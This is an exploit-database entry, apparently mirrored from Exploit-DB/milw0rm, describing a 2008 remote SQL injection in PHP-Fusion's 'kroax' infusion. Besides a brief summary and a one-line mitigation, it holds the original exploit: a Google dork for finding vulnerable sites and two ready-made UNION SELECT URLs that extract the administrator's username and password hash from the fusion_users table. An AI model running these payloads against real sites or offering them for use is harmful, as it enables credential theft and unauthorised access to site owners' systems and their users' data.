The kroax php_fusion Remote SQL-injection

vendor:

N/A

by:

boom3rang

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The kroax php_fusion Remote SQL-injection

The kroax php_fusion Remote SQL-injection is a vulnerability that allows an attacker to inject malicious SQL commands into a vulnerable web application. An attacker can use this vulnerability to gain access to sensitive information such as usernames and passwords. The exploit involves using a Google Dork to find vulnerable websites and then using two SQL commands to gain access to the username and password of the website. The first command is used to find the username and the second command is used to find the password.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.

Source

Exploit-DB raw data:

==========================================================
The kroax php_fusion Remote SQL-injection.
==========================================================

##################################
Author     :  boom3rang
Contact   :  boomerang@knaqu-shqipe.de
webpage  :  www.khg-crew.ws 
##################################


--- Remote SQL Injection ---

[+]Google Dork:                               inurl:"kroax.php?category" 

--------------
 Exploit
--------------

example:

www.site.com/infusions/the_kroax/kroax.php?category= [SQL]



[+] username:
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang


[+] password: 
www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\


ps. To find username use first  "SQL" with table_name  user_name, and for password use second "SQL" with table_name user_password.




==========================================================    Greetz to:  All my Albanian brothers   ==========================================================

# milw0rm.com [2008-06-26]